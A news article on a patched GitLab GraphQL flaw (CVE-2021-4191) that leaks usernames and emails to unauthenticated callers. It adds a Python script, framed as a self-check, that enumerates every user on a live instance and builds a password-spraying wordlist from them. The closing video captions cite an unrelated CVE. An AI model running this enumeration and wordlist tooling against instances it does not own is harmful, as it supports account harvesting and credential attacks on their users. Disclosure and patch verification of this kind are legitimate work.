Significant GitLab Security Flaw Impacts Thousands of Instances
Chapter 1: Overview of the Vulnerability
Security researchers have disclosed details of a now-patched vulnerability in GitLab, the open-source DevOps platform, that could allow an unauthenticated remote attacker to harvest user information from affected instances. It is an information disclosure flaw, not a reported breach, but the number of exposed self-hosted instances makes it significant.
Section 1.1: Details of the Vulnerability
The vulnerability, tracked as CVE-2021-4191, carries a medium severity rating (CVSS score: 5.3) and affects all versions of GitLab Community Edition and Enterprise Edition starting from 13.0, as well as all versions starting from 14.4 and prior to 14.8. Jake Baines, a senior security researcher at Rapid7, discovered and reported the issue.
Fixes for the flaw shipped in GitLab's critical security releases 14.8.2, 14.7.4 and 14.6.5 on February 25, 2022, following responsible disclosure to GitLab on November 18, 2021.
Subsection 1.1.1: Exploitation Potential
Baines noted in a report, "The vulnerability stems from a lack of authentication checks during the execution of certain GitLab GraphQL API queries." In practice, an unauthenticated remote attacker can query the instance's GraphQL endpoint and receive the usernames, display names and email addresses of registered GitLab accounts.
An attacker who obtains this list no longer has to guess which accounts exist: the genuine usernames of a target organization can be fed directly into password guessing, password spraying and credential stuffing attacks, which are far more effective against a known-valid account list than against guessed names.
"The data leak could also empower an attacker to create a new username wordlist based on GitLab installations, not just from gitlab.com, but also from the over 50,000 GitLab instances available online," Baines added.
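The following is an added example and is not code from the original article, from Rapid7 or from GitLab. It shows how an administrator can confirm that an instance no longer answers an unauthenticated `users` query after patching, and how little work it takes an attacker to turn a leaked response into the spraying wordlist described above. The query shape (the `users` connection with `username`, `name` and `publicEmail` fields, paged with `first`/`after`) follows GitLab's public GraphQL schema; the two sample responses are constructed here for the example and were not captured from any real instance.

```python
"""Self-check for CVE-2021-4191-style unauthenticated GraphQL user enumeration.

Added example (not the article's, Rapid7's or GitLab's code). The sample
responses below are constructed; only probe() touches the network.
"""
import json
from urllib import request

# GraphQL query an unauthenticated client can POST to /api/graphql.
# Field selection follows GitLab's public schema; it is the shape assumed here.
USER_ENUM_QUERY = (
    "query($after: String) { users(first: 100, after: $after) "
    "{ pageInfo { hasNextPage endCursor } "
    "nodes { username name publicEmail } } }"
)


def build_request_body(after=None):
    """JSON body for one page of the enumeration query (no token attached)."""
    return json.dumps({"query": USER_ENUM_QUERY, "variables": {"after": after}})


def extract_users(raw_response):
    """Return the user nodes a response exposes, or [] when it exposes none.

    An instance that still leaks returns populated nodes to an anonymous
    caller; a fixed instance is expected to return no nodes (or a null
    `users` field), which this treats the same way.
    """
    doc = json.loads(raw_response)
    users = (doc.get("data") or {}).get("users") or {}
    return [n for n in (users.get("nodes") or []) if n.get("username")]


def next_cursor(raw_response):
    """Cursor for the next page, or None when pagination is exhausted."""
    doc = json.loads(raw_response)
    info = ((doc.get("data") or {}).get("users") or {}).get("pageInfo") or {}
    return info.get("endCursor") if info.get("hasNextPage") else None


def leaks_users(raw_response):
    """True if an unauthenticated query returned at least one account."""
    return len(extract_users(raw_response)) > 0


def build_wordlist(users):
    """Derive candidate login names from leaked records, deduplicated in order.

    Usernames, full addresses and the local part of each public email are all
    plausible login identifiers for a spraying attempt against the same org.
    """
    seen, out = set(), []
    for u in users:
        candidates = [u.get("username"), u.get("publicEmail")]
        email = u.get("publicEmail")
        if email and "@" in email:
            candidates.append(email.split("@", 1)[0])
        for c in candidates:
            c = (c or "").strip().lower()
            if c and c not in seen:
                seen.add(c)
                out.append(c)
    return out


def probe(base_url, timeout=10):
    """Walk every page of `users` on a live instance you are authorised to test.

    Network-only helper; nothing in this file calls it automatically.
    """
    users, after = [], None
    while True:
        req = request.Request(
            base_url.rstrip("/") + "/api/graphql",
            data=build_request_body(after).encode(),
            headers={"Content-Type": "application/json"},
        )
        with request.urlopen(req, timeout=timeout) as resp:
            raw = resp.read().decode()
        users.extend(extract_users(raw))
        after = next_cursor(raw)
        if after is None:
            return users


# Constructed sample responses (not captured from any real instance).
LEAKY_RESPONSE = json.dumps({"data": {"users": {
    "pageInfo": {"hasNextPage": False, "endCursor": "abc"},
    "nodes": [
        {"username": "alice", "name": "Alice Example",
         "publicEmail": "alice@example.org"},
        {"username": "bob", "name": "Bob Example", "publicEmail": ""},
    ]}}})
PATCHED_RESPONSE = json.dumps({"data": {"users": {
    "pageInfo": {"hasNextPage": False, "endCursor": None}, "nodes": []}}})

if __name__ == "__main__":
    print("leaky instance leaks:", leaks_users(LEAKY_RESPONSE))
    print("patched instance leaks:", leaks_users(PATCHED_RESPONSE))
    print("wordlist:", build_wordlist(extract_users(LEAKY_RESPONSE)))
```

Run `probe("https://gitlab.example.internal")` only against an instance you own; a non-empty result after upgrading means the fix did not land (for example, a forgotten secondary node) and the accounts returned are exactly the list an attacker would spray against.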
Section 1.2: Additional Security Fixes
The same releases also address six other security vulnerabilities, including a critical flaw (CVE-2022-0735, CVSS score: 9.6) that lets unauthenticated users steal runner registration tokens, the secrets used to register runners that authenticate to GitLab and execute CI/CD jobs. A stolen registration token lets an attacker attach a runner they control to a project and receive its jobs, so affected installations should rotate those tokens after upgrading, not merely apply the patch.
Chapter 2: Video Insights on GitLab Security
This video discusses the implications of the GitLab security flaw, showcasing two examples where attackers exploited the vulnerability for a $5,000 bounty.
In this video, experts explain the urgency of the GitLab security alert regarding CVE-2024-45409 and its potential impact on users.